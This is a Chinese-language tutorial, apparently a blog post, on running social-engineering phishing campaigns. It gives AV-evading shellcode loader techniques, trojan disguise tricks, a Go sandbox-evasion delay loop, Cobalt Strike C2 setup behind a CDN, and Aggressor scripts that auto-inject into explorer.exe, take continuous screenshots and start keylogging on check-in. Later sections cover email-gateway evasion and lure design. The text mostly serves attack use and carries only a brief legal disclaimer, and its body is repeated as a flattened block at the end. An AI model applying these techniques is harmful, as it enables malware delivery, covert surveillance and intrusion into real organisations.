社工钓鱼基本流程与技术实现

前言

"穷则社工钓鱼，达则0day炸场"——微步在线。在没有后端资源支持的情况下，社工钓鱼是安全从业者的必备技能。本文详细讲解社工钓鱼的完整流程和技术实现细节。

一、前期准备

1.1 社交账号准备

账号类型：微信、QQ、脉脉、BOSS直聘、猎聘等
手机号来源：
- 阿里小号/和多号
- 辅助注册（微信）
- 匿名渠道购买（更安全）
邮箱准备：
- 常用QQ邮箱、163邮箱
- 购买渠道或向亲友借用

1.2 免杀木马制作

基本加载器原理

// ShellcodeLoader基本流程
1. shellcode申请内存(可读可写) -> VirtualAlloc
2. 载入内存 -> memcpy
3. 执行内存 -> CreateThread + WaitForSingleObject

免杀技术要点

函数替代：
- 申请内存：GlobalAlloc、CoTaskMemAlloc
- 执行内存：使用回调函数如EnumFontsW、EnumUILanguages、EnumFontFamiliesA
推荐项目：
- 360QVM_bypass（增加签名功能）
- 学习GitHub上的免杀项目进行修改

木马伪装技巧

修改图标
添加数字签名
捆绑正常exe文件
释放时提示"文件已损坏，无法打开"

1.3 沙箱绕过技术

以微步沙箱为例的对抗方法：

// 循环打印延时技术
func add() {
    start := time.Now()
    sum, i := 0, 1
    for i < 1000000 {
        fmt.Println(i)  // 循环打印
        sum += i
        i++
    }
    elapsed := time.Since(start)
    fmt.Println("该函数执行完成耗时：", elapsed)
}

技术要点：

避免使用Sleep函数（容易被hook）
沙箱分析有时间限制，通过长时间循环绕过
将延时代码放在shellcode执行前

二、信息收集

2.1 信息收集思维导图

信息收集
├── 公司基本信息
│   ├── 官网
│   ├── 业务范围
│   └── 组织架构
├── 人员信息
│   ├── 高管信息
│   ├── 技术人员
│   └── HR/招聘人员
├── 联系方式
│   ├── 邮箱格式
│   ├── 电话格式
│   └── 社交账号
└── 业务信息
    ├── 招聘信息
    ├── 招标信息
    └── 合作伙伴

2.2 具体收集方法

零零信安：直接搜索公司名称获取邮箱地址
搜索引擎技巧：
- 组合搜索：@xxx.com 招聘
- 组合搜索：@xxx.com 校招
- 组合搜索：@xxx.com 投标
- 组合搜索：@xxx.com 联系方式
微信搜一搜：使用邮箱后缀+关键字搜索

三、C2基础设施搭建

3.1 基本配置

使用Cobalt Strike(CS)作为C2平台
通过CDN隐藏真实IP
C2上线端口反代

3.2 实用CS插件脚本

推荐使用PushPlus2插件，包含以下功能：

自动迁移进程

sub callback{
    $regex = '(.*\n)+explorer.exe\t\d+\t(\d+)(.*\n)+';
    $listener = "ecloud"; // 修改为你的监听器名称
    if ($2 ismatch $regex){
        $pid = matched()[1];
        $inject_pid = $pid;
        if (-is64 $1){ $arch = "x64"; }
        else{ $arch = "x86"; }
        binject($1, $pid, $listener, $arch);
    }
}
if($inject_pid != beacon_info($1,"pid")){
    bps($1, &callback);
}

上线自动截图

// 单次截图
// binput($1, "screenshot");
// bscreenshot($1);

// 连续截图
binput($1, "screenwatch");
bscreenwatch($1);

其他实用功能

// 执行自定义命令
bshell($1, "ipconfig /all");

// 键盘记录
bkeylogger($1);

3.3 权限维持

Bypass UAC技术
计划任务添加
服务持久化
可编写CS脚本实现上线自动执行

四、邮件钓鱼技术

4.1 邮件网关/沙箱对抗

正文处理

避免出现知名公司名称（如脉脉、BOSS直聘）
不将附件解密密码放在正文中

附件处理

文件名加密
将解压密码写在附件名称上
使用压缩包+密码保护

4.2 钓鱼话术设计

根据收集的信息定制化内容
常见场景：
- 招聘相关
- 业务合作
- 系统通知
- 会议邀请
保持专业性，减少怀疑

五、上线后操作流程

参考L33h0m的CS钓鱼流程导图：

权限维持
- 获取持久化权限
- 提升权限
信息收集
- 内网信息
- 敏感数据
- 凭证收集
后渗透阶段
- 横向移动
- 权限提升
- 目标达成

六、总结与注意事项

社工钓鱼是系统性工程，需要前期充分准备
免杀是基础，需要持续更新对抗技术
信息收集决定成功率，越详细越好
保持隐蔽性，所有操作应考虑对抗检测
法律风险，仅供安全研究学习

参考资源

本文详细讲解了社工钓鱼的完整流程和技术实现细节，从前期准备到后期渗透，涵盖了关键技术和注意事项。请务必在合法授权范围内使用这些技术进行安全测试和研究。

社工钓鱼基本流程与技术实现前言 "穷则社工钓鱼，达则0day炸场"——微步在线。在没有后端资源支持的情况下，社工钓鱼是安全从业者的必备技能。本文详细讲解社工钓鱼的完整流程和技术实现细节。一、前期准备 1.1 社交账号准备账号类型：微信、QQ、脉脉、BOSS直聘、猎聘等手机号来源：阿里小号/和多号辅助注册（微信）匿名渠道购买（更安全）邮箱准备：常用QQ邮箱、163邮箱购买渠道或向亲友借用 1.2 免杀木马制作基本加载器原理免杀技术要点函数替代：申请内存：GlobalAlloc、CoTaskMemAlloc 执行内存：使用回调函数如EnumFontsW、EnumUILanguages、EnumFontFamiliesA 推荐项目： 360QVM_ bypass（增加签名功能）学习GitHub上的免杀项目进行修改木马伪装技巧修改图标添加数字签名捆绑正常exe文件释放时提示"文件已损坏，无法打开" 1.3 沙箱绕过技术以微步沙箱为例的对抗方法：技术要点：避免使用Sleep函数（容易被hook）沙箱分析有时间限制，通过长时间循环绕过将延时代码放在shellcode执行前二、信息收集 2.1 信息收集思维导图 2.2 具体收集方法零零信安：直接搜索公司名称获取邮箱地址搜索引擎技巧：组合搜索： @xxx.com 招聘组合搜索： @xxx.com 校招组合搜索： @xxx.com 投标组合搜索： @xxx.com 联系方式微信搜一搜：使用邮箱后缀+关键字搜索三、C2基础设施搭建 3.1 基本配置使用Cobalt Strike(CS)作为C2平台通过CDN隐藏真实IP C2上线端口反代 3.2 实用CS插件脚本推荐使用PushPlus2插件，包含以下功能：自动迁移进程上线自动截图其他实用功能 3.3 权限维持 Bypass UAC技术计划任务添加服务持久化可编写CS脚本实现上线自动执行四、邮件钓鱼技术 4.1 邮件网关/沙箱对抗正文处理避免出现知名公司名称（如脉脉、BOSS直聘）不将附件解密密码放在正文中附件处理文件名加密将解压密码写在附件名称上使用压缩包+密码保护 4.2 钓鱼话术设计根据收集的信息定制化内容常见场景：招聘相关业务合作系统通知会议邀请保持专业性，减少怀疑五、上线后操作流程参考L33h0m的CS钓鱼流程导图：权限维持获取持久化权限提升权限信息收集内网信息敏感数据凭证收集后渗透阶段横向移动权限提升目标达成六、总结与注意事项社工钓鱼是系统性工程，需要前期充分准备免杀是基础，需要持续更新对抗技术信息收集决定成功率，越详细越好保持隐蔽性，所有操作应考虑对抗检测法律风险，仅供安全研究学习参考资源 360QVM_ bypass ShellcodeLoader 分享我的CS钓鱼流程导图 Aggressor Script官方文档本文详细讲解了社工钓鱼的完整流程和技术实现细节，从前期准备到后期渗透，涵盖了关键技术和注意事项。请务必在合法授权范围内使用这些技术进行安全测试和研究。